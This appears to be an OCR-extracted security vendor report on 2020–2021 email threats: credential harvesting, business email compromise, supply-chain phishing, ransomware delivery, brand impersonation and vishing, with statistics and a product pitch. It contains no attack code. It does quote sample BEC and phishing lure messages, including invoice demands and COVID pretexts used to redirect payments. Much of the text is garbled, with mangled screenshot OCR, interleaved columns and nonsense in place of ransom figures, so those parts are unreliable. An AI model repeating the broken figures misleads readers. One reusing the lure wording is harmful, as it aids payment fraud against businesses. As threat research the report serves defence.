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Introduction 


It started out with a phish; how did it end up like this? Inspired from the lyrics of the song 
Mr. Brightside by The Killers, we’ve seen first-hand how phishing threats can end up as 
million-dollar ransom demands, financial fraud and other damages to organizations. We 
invite you to “open up [your] eager eyes” as we explore the threats targeting your inbox. 


The past twelve months have brought unique challenges as the global COVID pandemic 
forced organizations to rapidly adopt new business procedures amid remote operations 
and disrupted supply chains. While it had always been business-critical, email 


became even more crucial. 


The same can be said for the other side as threat actors focused on emails to launch a 
variety of attacks. Infamous incidents discovered and played out in the past year included 
the SolarWinds breach that highlighted the deadly impact of supply-chain attacks and 


numerous “successful” ransomware campaigns, including the Colonial Pipeline attack on 


public infrastructure and Kaseya supply-chain ransomware hack, prompting multiple 


FBI alerts and an executive order on improving cybersecurity. 


While there’s still plenty of uncertainty as we approach the post-COVID world, one thing is 
clear: inboxes aren’t clean. Threats ranging from nuisance spam to difficult-to-discover but 
costly business email compromise (BEC) continue to target organization inboxes. 


We analyzed a sampling of over 31 million threats discovered from May 1, 2020 to April 30, 
2021 across organizations and found several interesting patterns. Read along to learn more. 
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Key Findings 


IDENTITY IS THE KEY 


As the saying goes, go for the lowest hanging 


fruit. In phishing, that fruit is the credential. 


Credential harvesters are the most common 


threat type in email. 


Nearly 10 percent (9.3%) 
of malicious attacks involve 
credential harvesters. 


Why bring a battering ram, when you can 
just steal the keys to the door? Attackers look 


for the path of least resistance, so if you can 


spend three minutes crafting an email to steal 


credentials versus spending hours devising a 


way past firewalls and other protections, why 


wouldn’t you go that route? 
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LOW VOLUME, 
HIGH RETURNS 


Business Email Compromise (BEC) is the 
latest example of researching your target. 
They involve a lot more care and feeding 


than traditional phishing attacks. 


Although BECs make up a tiny volume 
of attacks, they represent the highest 
financial damage. In our data, BEC 
acccounted for 1.3% of attacks 
but would have resulted in over 
$354 million in direct losses. 

The average BEC request in our 
findings is nearly $1.5 million. 


TRUST NO ONE, LEAST 


OF ALL YOUR “FRIENDS” 


Identity deception using tactics like 
spoofing, domain impersonation and 
display name impersonation is used in 
nearly 9% of attacks. 


These attacks showcase the ease at which 
people can deceive the common user to 
gain access to their goals. In many cases, 
it’s as simple as a display name change 

to seriously wreck someone’s weekend 
and lose trust in who they’re dealing with. 


Speaking of trust... 
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Key Findings — continued 


THE ENEMY YOU KNOW WHAT ABOUT SPAM? 


What’s even better than pretending to be Jan from accounting? End user training does wonders in helping foster a culture of security 
How about being America’s favorite retailer with a special offer just in an organization. However, not every end user has their CISSP. True 
for you! Attackers impersonate known brands to add legitimacy to positive phishing submissions are amazing for the safety 

phishing campaigns. of an organization. 

The top 10 most impersonated brands make up over However, more than 92% of user-reported phish are not 
56% of all impersonation-based phishing attacks. malicious and are actually benign, spam or bulk mail. 

These attacks will always present a challenge to most users. Training isn’t enough to stop the white noise heard by 

Things like the latest trends in the news or entertainment the security admins. 


can spell big bucks for attackers. 
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It Started out with a Phish 
How did it end up like this? 


Unlike the song by The Killers, there isn’t a “brightside” Here are the analyzed threat samples we discovered from 
to phish. (And you can blame us for getting the song May 1, 2020 to April 30, 2021 broken down below by volume. 


9.33% 8.96% 8.96% 3.31% 92.27% i f | 


stuck in your head.) 


With unerring consistency, almost all breaches begin with an 
innocuous looking phish or an email. Low tech, low maintenance 
and practically free, phishing can be a profitable business model 


for attackers with low infrastructure costs due to the prevalence 


of inexpensive cloud-based email providers like Gmail. By using 


these legitimate hosting services, attackers can sneak under ee EL pesano 2.39% 

Fi 3 , F : EE IDENTITY DECEPTION E scam 1.48% 
the email security radar straight into inboxes. i 

WE Link | sec 1 
A F . I ATTACHMENT HB propper 0.37% | 
What looks like an harmless email from a long-standing Mori Moir 0.11% | 
vendor or even a routine email from the IT department can 
harbor devastating consequences if clicked, leading to 
shutdowns, loss of data or even financial costs in the millions. 
We cannot stress enough the importance of stopping these (Detailed threat type descriptions can be found in the Appendix of the report.) 
8 p pping 


threats before they reach users. 
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7 OF ATTACKS INVOLVED 
O CREDENTIAL HARVESTING 
e 


IMPERSONATED SENDER: 
NO-REPLY@SHAREPOINTONLINE[.]JCOM 


eoo 


‘SharePoint Onine | via sharepoit Sisia <no-reply@sharepointoniine.com> 200 PM 


. 
Weu have recehod a new Mie vio Share Boi 
> . - 


Soeey-Tee Swepart Tmar 2 REPLY-TO MISMATCH: 
HELP.DESK.MESSAGE.ALERT@MAIL[.]COM 


Po SharePoint 


Your organization has shared a secured document with 


you via Microsoft Si 
3 IMAGE OF A 


SHAREPOINT EMAIL 
@ March Financial Reports & Ci 


This attachment orty works for the direct reciprert of this massage 
‘Sign in wth your Microso® account to access the sarod Mos 


Pran atanan 


HTML ATTACHMENT CONTAINS 
CREDENTIAL HARVESTER 


a 


Sign in to view the document 


agag | prm 
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Credential Harvesters: 
Compromised Identities 


When users open the front door, attackers don’t need any backdoors. 
The largest threat type by volume in our findings, credential harvesters 
can refer to either the attack method or malware that steals a user's valid 
password, which is then used to gain access to unauthorized data. 


Also considered a type of social engineering attack, credential harvesters 
typically start as a phishing email with a link to a fake login page made 
to look like a legitimate organization’s site. Alternatively an email with 
weaponized attachments can also install credential-harvesting malware 


onto an end user’s system. 


While the websites and lures used range in sophistication, the most 
convincing attacks require advanced technology and trained security 
analysts to identify. By impersonating recognized brands and using 
legitimate cloud hosting services (e.g. Google Drive, Microsoft OneDrive, 
etc.) as part of their attack infrastructure, these attacks can bypass 


security systems and “security aware” users. 
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Supply Chain Attacks 


Targeting Organizational Weaknesses (aka Your Friends’) 


The SolarWinds and Kaseya incidents catapulted 
supply chain attacks into the spotlight due to its 
widespread impact and continued repercussions. 
As in this case, where many of the victims were 
renowned security organizations themselves, 
anyone can become a victim when attackers 


exploit trusted partners and third-party vendors. 


Supply chain attacks don’t all require 
surreptitiously sabotaging software to succeed. 
In fact, phishing attacks are one of the most 
common ways to start a supply chain attack. By 
compromising a trusted partner first, attackers 
can launch business email compromise (BEC) or 
ransomware attacks that result in financial loss in 
the millions. We’ll explore these two attack 


types in more detail in the following sections. 
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TOP 7 ATTACK 


TECHNIQUES 
USED IN 
SUPPLY CHAIN 
ATTACKS 


Compromised 
Partner Account 
+ New Domain 


Attacker uses a new 
domain to send out 
phishing campaigns or 
reference new domains 
within a message from 
a compromised partner. 


/ ©2021 


Compromised 
Partner IP 
/ Domain 


Attacker compromises 
a known good 
organization, sends 
messages using 

their domain and 

IP address. 


Compromised 
Partner Account + 
Malicious Payload 


Attacker compromises 
a partner, leveraging 
a known employee 
name to send out 
messages containing 
a malicious payload. 


Compromised 
Partner Account 


Attacker compromises 
a valid organization. 

In some instances, 
organizations sending 
out phishing campaigns 
may be fronts or owned 
by threat actors. 


Compromised Partner 
Account + Infiltrated 
Supply-Chain BEC 


Attacker uses a 
compromised partner 

to send out BEC 
messages with no 
payload, often hijacking 
benign email threads 

to divert payment. 


Compromised 
Partner Account 
+ URL Campaign 


Attacker uses a 
compromised partner’s 
domain to send phishing 
emails with links that host 
credential harvesters or 


malicious payloads. 


Partner Spoofing 


Attacker spoofs 

a partner without 
actually compromising 
the partner. Domain 
spoofs or registered 
look alike partner 
domains are common. 
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Business Email 


Compromise (BEC): 


Low Volume, Low 
Tech, High Payouts 


BEC attacks range from the easily recognizable 
spoofed sender to sophisticated supply chain attacks. 


Type 3 and Type 4 both rely on exploiting established 
trust with existing partners and vendors. By adding 

in tactics like spoofing sender domains, hosting 
attachments in legitimate services and using timely 
lures, these malware-less attacks can create detection 
challenges for many security systems. Many Type 4 
BECs also use partner account-takeover attacks 
where the partner victim is unaware they have been 
compromised. Later, the attacker pivots the thread 

to the attacker account to divert payment. 
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ece G Move to... 


Caroline mm February 16, 2021 at 12:09 AM 
[EXTERNAL] Updated Terms, Current Statement & Pending Invoice 
To: undisclosed-recipients:; 


This message is from an EXTERNAL SENDER - be CAUTIOUS, particularly with links and attachments. 


Fann Pa cand our payment erne, going erward pring vdt be ona net 30 ae, attached is our updated terms and conditions, 
we have also attached a copy of your current statement for 


This is another reminder that we are yet to receive the $57,400 owed on invoice #10237. Please be aware that, as per my terms, we may charge you additional interest 
on payment received more than 30 days past its due date, find attached a copy of the invoice incase the original copy was lost or deleted. 

Again, please reach out if you have any questions on this payment. Otherwise, please organize for settlement of this invoice Immediately. 

tips web tresorit. com 

Kind regards, 
Caroline Seman: 


BECS MADE UP ONLY 1.3% OF ATTACKS 
BUT WOULD HAVE RESULTED IN OVER 


TYPE 1 
Spoofed Executive, 
Sender or Domain 


e CXO as lures 

e Inter-organization 
impersonation via 
spoofed sender 
and domains 


TYPE 2 
Compromised 
Employee Account 


e Employees as lures 

e Intra-organization 
impersonation via 
employee account 
takeover 


TYPE 3 
Spoof Impersonating 
Supplier 


TYPE 4 
Infiltrated Supplier / 
Supply Chain Attack 


e Supply chain / partner 
employees as lures 


Inter-organization 
impersonation via 
spoof or supplier 
account takeover 
Long con with delayed 
call-to-actions 
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Business Email Compromise (BEC): continued 


BEC TYPE 4 EXAMPLE 


. 
These attacks use partner s 
account-takeovers to 

hijack legitimate, benign 
conversation threads before 


pivoting the conversation to 


the attacker’s account 


THE AVERAGE BEC 
REQUEST IS NEARLY 


sig 


MILLION 


THE MEDIAN 
BEC ATTEMPT 


IS OVER 


$200K 
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Q Tienu a aar naca raray A 
= Qj = == s====—4 ATTACKER HIJACKS THREAD i 
È AND PIVOTS TO ATTACKER ACCOUNT 
Hi Tanya, 
‘Thank you for the information, 


Pissa be informed thal a stall member was diagnosed with Covid 19 issi weak so wate working from home for sall-isotation and hence we won't be able to 
receive check payment til further notos. 


Please kindly advise you could initiate ACH/wive iraraser on the advised payraces date , | will send subsidiary LLC bank infoematien to receive payment atthe receipt of your 
‘confirmation, 


Looking forward to your rafi rexpomac on this. 


Trark you, 
Yavin ee 


From: Tanyana 

Sent: Tusaday, Aprè 13, 2021 9:30 AM 
‘To: Yannick 
Subject: RE: [EXTERNAL] š 


Hi there, 


—_ 
Invoices « February 


o 
y 


Looks Iho the expected payment date is Aprii 27", 2021. R should come via check. 


Do you need anything eise tom me? 
Tanya 


LEGITIMATE, BENIGN 
EMAIL THREAD 


$4+ Million BEC fraud stopped 


The attacker compromises a partner’s account 
(“Jeffrey”), then hijacks a benign conversation 
thread. Sending from a malicious look-alike 
domain, the attacker pivots the thread to 

the attacker's account. The look-alike sender 
domain is identical to the benign sender domain 
but ends in .co instead of .com. 
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eco ‘a 
Q 


i © Re Aeran Payment 


Te Gag) 


$250K BEC fraud with COVID lure stopped 


The attacker compromises a partner’s account 
(“Yannick”) to hijack a benign email thread, 
pivoting the thread to the attacker’s account. 
COVID lures are used to make the attack more 
convincing and timely. The malicious look-alike 
sender domain used is nearly identical to the 
benign sender domain; the attacker just added 
an extra letter (e.g. “buy.com” vs. “buvy.com” [not 


the actual domain used]). 


aa e - Enen. 


Eco 

Can you pinas canoa the check and par a sinp payment on #7 Wo are yot io moso fhe check ans gwen whos we co. wR won bo abin Io process Pe chech or deposit E 

S Sn caging SSR ease nave expen, payee DUA cesar Quy AARAA SO ar ON NS and navar RE CF r000 18 Gama ona vo Go wan 
1 happen agan. 


fotos lower, 11 Be to bten you Gaat ol pepe bom 
De att mane a are Ware ot ACH payer ef payers so san soe YU me 


sr bo oont to ou now aseur vta olasronto eer@IACH Poasa let mo know it you wii 
‘sour nfo in eroa dou Olay wt es DreBo 


Prasan bt me how E you Nave wry questions. 


A T was mated over 
ERRER 


‘N 
noO 


‘N 
\ O, Tua. Aor 27. 200) 1196 A eg re: 


On Ag 27, 2021, of 11-17 AN, Joey S wre: 


Can you please advise on when the outstanding balance for this transaction wil be paid? Please let me know as I've got important 
information to share with you regarding our new payment optons to be used for this transaction. 


Your swift response is groaty apprecated. 


With best regards, 
Jott 
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Ransomware: The End Stage 


High profile cases of ransomware such as the Colonial Pipeline 
attack, which also used credential harvesting, by now-defunct 
ransomware group DarkSide have prompted federal government 
warnings on their severity and disruption to services, not to 


mention their high financial costs. 


In the case of Colonial Pipeline, the ransomware payment alone 
cost the company EZ with additional system restoration 
costs estimated to be in the tens of millions. U.S. Homeland 
Security has cited losses from NotPetya, another “famous” 
ransomware variant, as high as KAO JIJI Ransom demands have 
also increased, with the Kaseya ransomware claiming the largest 


demand on record at 40) iil ieee 


The delivery of these devastating attacks are almost always via an 
email phish. In fact, the ransomware categorization only happens 
at the very end of the attack chain when data is already lost and 

a ransom demanded. Other than backing up data and having a 
recovery plan, the most important thing an organization can do is 


to prevent that initial phish from getting in in the first place. 
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FIVE RECENT 
RANSOMWARE 
TRENDS 


Extortion is being 
used in conjunction 
with or as a backup 

for ransoms 


Phishing has replaced 
remote code execution 
(RCE) as the preferred 


delivery method 


The time between 
ransomware 
deployment to 
asset compromise 
has exponentially 
shortened 


Ransomware 
is increasingly sent 
via nested links 
in emails 


Threat actors 
are actively hiring 
in open marketplaces 
for “developers” 
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Ransomware: 
How Ransomware Gets ee E 


attacks are typically 
delivered through 


Executed On Victim y -o= EE 2o | phishing attacks 


To: = memeo In this example, a 
Reply-To: ay compromised sender 
sends a phishing 
E S a A EXTERNAL EMAIL email to a partner 
Phishing emails are the first stage in company. Nested links 
the delivery mechanism EE, 1 ted to oat you oo evn (PDF-vers), I need 10 debit fees from your lead to the download 
payroll during next 2,5 hours. of the BazarLoader 


copy this link and paste to your browser: malware, which 


To preview 
mpa // does googie cordoane A PO en vX eventually leads 
SXynKcPtZCaO3qDNPnJtZStnfom, 
al/pub (Oena eO OR to infection with 
First stage loaders establish persistence DEG Ryuk ransomware. 


via remote access trojans (RATs) for recon 


Customer Complaint. pat pate utonniantiy very 3 minten 


The attacker uses a 
legitimate service 
(Google Docs) to host 
a seemingly benign 
page, seen below. If 
clicked, the link on 
this page leads to 
the download of the 


malicious payload. Custamer Comolaint 411/13 for comoany emnlovees 
‘Published by Googie Dore ~ Report Abuse v 


Ultimate payload is delivered 


Customer Complaint #10/13 


RANSOMWARE IS THE FINAL 
STAGE, NOT THE FIRST 
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Brand Impersonation: 
Fake It Til You Make It 


Organizations use their branding to establish reputation and cultivate 
trust with their customers. Attackers take advantage of this trust by 
using brand impersonation in their attacks. 


Similar to identity deception, which we track separately, brand 
impersonation occurs when a threat actor impersonates a trusted 
company or well-known brand to add legitimacy to their phishing 
attack. Using stolen branding and images that are often identical to 
the legitimate brand, attackers use any methods to get victims to click. 


As we saw in the earlier BEC example with COVID lures, these 
impersonations often focus on trending brands or events. With 
COVID as the main headline for the majority of 2020 and into 2021, 
it’s no surprise that the World Health Organization (WHO) was the 
#1 most impersonated brand, beating annual “favorites” like Google, 
Microsoft and Target. 
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Top 10 Impersonated Brands 


World Health 
Y Organization @ (D) 


2 Google 7 1) Marketo” 


An Adobe Company 


EE Microsoft 8 Linked[f) 


4 @target > facebook 


i amazon 10 T - -Mobile- 


COVID Spotlight 


As the use of web conference tools 
increased during the pandemic, 
attackers also began impersonating 
web conference brands. Here are top 
web conference brands ranked based 
on how often they're spoofed. 


@ zoom @ U 


Cisco 


@ webex @ E Google Meet 


FE 9% 
Say 


IDENTITY DECEPTION IS USEL 
IN NEARLY 9% OF ATTACKS 


24 


BRAND IMPERSONATION 
MAKES UP 2.4% OF ATTACKS 
BASED ON VOLUME 
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Like many other attacks, an increase in vishing 


Vishing: A Marriage on Inconvenience during a specific time period can indicate vishing 


campaigns. In our data, we saw a significantly 


high volume of vishing attacks in mid-September 


2020, with smaller campaigns occurring around 
An interesting trend in the intersection of voice and email threats is vishing. the winter holidays, February and May of 2021. 


Vishing, the short form for “voice phishing,” usually refers to the practice of 
leaving fake voice messages in hopes that victims will call back to provide Ao caan Inithe chars aelou, Venage Ia iosi 
cyber attacks, occur most frequently on weekdays 


personal information which will be used in other attacks. ae. : ; : 
when victims are more likely to check their emails. 


In our case, we have observed attackers combining email and voice vectors 
by sending emails with attachments of a voicemail recording, media file or 

a link to one. We have also observed attackers sending emails that had 

no malicious payloads, just simply a phone number. The attackers purported 150800 
to be from reputable companies to entice targets to call the number and 

reveal personal information, such as bank details and credit card numbers. 

In some cases, the attackers would also attempt to walk victims through a 80,000 
series of steps on their computers that would result in the download of 


malware or would enable remote access to their system. 

40,000 
Cloud providers and traditional email security providers like Microsoft 
tend to miss these attacks, especially when the malicious link is embedded in 


an attachment. Combining obfuscations and redirections, attackers know 0 -amann anamnman PETE TOE 


these messages end up reaching the end user and will continue using aan H aa 2020 020 T 2020 E #020 2021 Hee R 2020 i 


these techniques until stopped. 
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Vishing Example 


In this example, the attacker uses j a 

display name spoofing to impersonate 000 

a legitimate organization. The email 

contains an .htm attachment purporting B System® 7:38 AM 
to be a voicemail message. In actuality, New (22 seconds) message from (570) 3029-**** on February 18, 2021, 8:34:59 AM G 


the attachment contains a Javascript } To: 


redirection and obfuscated URL to 
redirect the victim to a credential 9 
n 
VM_745281.htm 


harvester impersonating a Microsoft 


login page. 
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How Did We End Up Here? 


92% 


MORE THAN 92% OF 
USER-SUBMITTED REPORTS 
ARE NOT MALICIOUS 


Unlike spam and commodity malware, targeted 


attacks make up a relatively low volume, yet can cause 


substantial damage, as examples in this report indicate. 


Attackers use a variety of tactics and techniques 

to evade detection from email providers and 

secure email gateways (SEGs). Tactics like leveraging 
stolen credentials fly under the radar since legitimate 
accounts and logins are used. Newly created domains 
used to spoof legitimate domains do not have any 
malicious reputation so can easily be missed by legacy 


security systems. 
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DOES SECURITY AWARENESS 
TRAINING AND USER- 
REPORTED PHISH WORK? 


Security awareness training can be beneficial 
from an educational and awareness 
perspective, but it’s not always effective 

at stopping threats. Many attacks use 
sophisticated impersonation techniques 

that fool all but the most skilled trained 
professionals. Not to mention with account 
takeover attacks, the victim typically does 
not even know they have been compromised. 


User-submitted phish is often inaccurate and 
relying on these reports can increase time 
and resource costs for both end users and 
the IT/security department. In our findings, 
more than 92.1% of user-submitted “phish” 
were actually benign, spam or bulk mail. At 
the same time, security teams chasing after 
false-positives means less time to find and 
investigate actual threats. 
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Missed Threats within a One Month Period 


Each row of missed threats in the chart below make up less than a 0.5% of that month’s email traffic, but it just takes one 


missed threat to cause a security disaster. Our last column may also help put these threats in a different perspective. 


ORGANIZATION EMAIL SECURITY MISSED TOTAL EMAIL 
INDUSTRY SYSTEM USED THREATS VOLUME In Other Words.... 


Insurance a 517,968 103.099.539 O More than half a million 
Software we) chances of a successful attack 
a 
Pharmaceutical Proofpoint 448,440 432,611,141 ANOS Ret tt Mas Uy 
inboxes per day for users to deal with 
Cisco Email oe |) er 
Food and Seen 105,603 420,088,334 ! x 3,500+ user submissions a day 
Beverage Ce iC IT has to deal with 


-O-O  45,000+ investigative hours 
Education Custom 90,763 142,672,221 i @) o for security teams 


0--O--O (at only 30 min per incident) 
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Recommendations 


Cyber criminals are always innovating, and staying a step ahead of them can be a challenge without the right people, processes and tools. 


Here are our top recommendations to keep targeted threats out of your organization’s inboxes. 


LOCK DOWN IDENTITY ESTABLISH TAKE A ZERO TRUST 


With attackers taking the easy route of PROTOCO ES AND APPROACH WITH EMAI E 
stealing credentials, secure accounts and P ROC EDU RES AGAI NST Ree E ET 


identities by adding additional protection 


likemulti-factor authentication (MFA). F I NANC IAL FRAU D communication vehicle for organizations 


and attackers’ rampant use of spoofing, 

Never reuse passwords and Establish and train on procedures to prevent it's imperative to verify all communication 

always change default passwords. financial loss in the case of BEC and financial thet neppens witnin emen, 
fraud, such as requiring multiple approvers 


a o a en vana va Ne e Remove implicit trust by assessing the 


transferring funds to new accounts. validity of messages beyond the sender 


to reduce risk from compromised partners. 
Train users to avoid clicking on malicious Choose a security system that can detect 
content in phishing emails, but also train compromises and apply controls around 


them on what to doif they fall for the phish. CODOS COMMUNCAHONS tO EEan 


zero trust to email. 
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Recommendations 


Cyber criminals are always innovating, and staying a step ahead of them can be a challenge without the right people, processes and tools. 


Here are our top recommendations to keep targeted threats out of your organization’s inboxes. 
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DON’T ALWAYS BELIEVE 
WHAT YOU SEE 


Brand impersonations have gotten better 
with attackers hiring designers and stealing 
logos. Invest in solutions with advanced 
technologies like optical character 
recognition (OCR) parsing and natural 
language understanding (NLU) modeling 

to accurately detect phishing emails 

using impersonation and identity 


deception techniques. 
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FOCUS ON PREEMPTION 


Threats are always easier to deal with 
before they reach end users. Implement 
security awareness, but don’t rely on users 
to be the front line defense. With the 
majority of modern attacks starting with a 
phishing email, deploy a preemptive email 
security solution to keep threats out of your 
organization in the first place. Choose a 
cloud-based, dynamically scalable solution 
that uses advanced technologies to track 
attacker infrastructure to truly preempt 


attacks before they reach inboxes. 


A 


AREA 1 


Area 1 Security uses advanced 
techniques, wide-scale threat indexing 
and attacker infrastructure tracking to 
preemptively detect and stop malicious 

attacks like those seen in this report 
from ever reaching inboxes. 


To find out more about the 
attacks we’re discovering, or to see 
what threats are already in your 
organization, we invite you to 


SCHEDULE A COMPLIMENTARY 
PHISHING RISK ASSESSMENT 


A AREA 1 
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tively stops Business Email Compromise, malware, ransomware and targeted phishing 
stops phish — the root cause of 95 percent of breaches — 24 days (on 


y industry’s first and only performance-based pricing model, Pay-per-Phish. 


, or subscribe to the 
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A EA 


Appendix: 


Credential Harvester — Credential 
harvesters are sites set up by an attacker 
to deceive users into providing their login 
credentials. This type of attack presents 
the user with a page that imitates an 
account login page. Unwitting users who 
enter their credentials unknowingly provide 
attackers with the credentials to their 
accounts. 


Identity Deception — Identity deception 
occurs when an attacker or someone with 
malicious intent sends an email claiming 
to be someone else. The mechanisms and 
tactics of this vary widely. Some tactics 
include registering domains that look 
similar (aka domain impersonation), are 
spoofed, or utilize display name tricks 

to appear to be sourced from a trusted 
domain. Other variations include sending 
email utilizing domain fronting and high 
reputation web services platforms such as 
G-Suite and 0365. 


Link — When clicked, a link will open the 
user’s default web browser and render the 
data referenced in the link, or open an 
application directly (e.g. a PDF). Since the 
display text for a link (i.e., hypertext) in 
HTML can be arbitrarily set, attackers can 
make a URL look like it links to something 
benign while it is actually malicious. 
Malicious links can lead to arbitrary code 
execution or Remote Code Execution 
(RCE), credential harvesting, click fraud, 
unwanted installs or other compromises. 
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Attachment — An attachment is any file 
attached to an email that, when opened 
or executed, performs a series of actions 
set by an attacker. Attachments can often 
masquerade as other file types by using 
mismatching extensions or otherwise 
deceptive file names. Attachments can 
lead to malware installation, such as 
backdoors and remote access trojans 
(RATs), or contain links to other malicious 
content and files. 


Brand Impersonation — Brand 
Impersonation occurs when a threat actor 
impersonates a trusted company or well- 
known brand to add legitimacy to their 
phishing attack. 


Extortion — Extortion is a tactic used 

to coerce an entity to perform a set of 
actions they would not otherwise perform. 
Extortion is identified when an attacker 
contacts intended victims with instructions 
to follow in order to avoid compromise or 
release of sensitive data. Unfortunately, 
even following attacker instructions can 
still result in compromise. For this report, 
scareware is also included in this category. 
Scareware is a form of malware which uses 
social engineering to cause shock, anxiety, 
or the perception of a threat to manipulate 
users into downloading and/or buying 
unwanted software. Usually the purported 
malware isn’t real and the software is 
non-functional or malware itself. 
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Threat Type Descriptions 


Scam — A scam is a broad category of 
fraud with the purpose of enticing a 
victim to provide money with the promise 
of a significant sum in return. The victim 
can be led to believe they are making an 
investment, which may involve the sender 
promising to pay the victim a large sum to 
transfer or process money, or may simply 
involve funding a fraudulent company 

for example. 


BEC — Business Email Compromise (BEC) 
is an increasingly common, effective 

and costly targeted email attack that 

is designed to trick recipients into 
transferring funds, typically through 
forged invoices, to scammer accounts. 
BEC falls into various categories based on 
its sophistication, ranging from using a 
spoofed email to compromising a vendor 
in a supply-chain attack. In the latter 
example, it is not uncommon for the 
process to play out over several weeks 
while the scammer is grooming the victim 
by email and/or occasionally by phone. 
Our BEC ebook discusses the different 
types of BEC in more detail. 


Dropper — A dropper is a malicious 
executable binary whose purpose is to 
decrypt, unobfuscate and/or extract a 
secondary malicious payload. Along with 
the malicious payload, the dropper may 
open a benign lure document to serve 

as distraction against the human target 
during the infection process. Typically, a 
dropper is extracted from a carrier file such 
as an Microsoft Office document, PDF, or 
other common container style document. 
Carrier files are usually engineered with an 
exploit that causes the viewing application 
to begin executing the attacker's code, 
leading to executing of the dropper and 
installation of malware. 


Other — For the purpose of this report, 
other threat detection categories with 
statistically insignificant numbers have 
been consolidated into the “other” 
category. This includes IP policy (detection 
based on a customer-specific policy), 
target development (attacker information- 
gathering to facilitate a successful attack) 
and encrypted email (phishing messages 
that contain encrypted content as a means 
to circumvent email security systems), 
among others. 


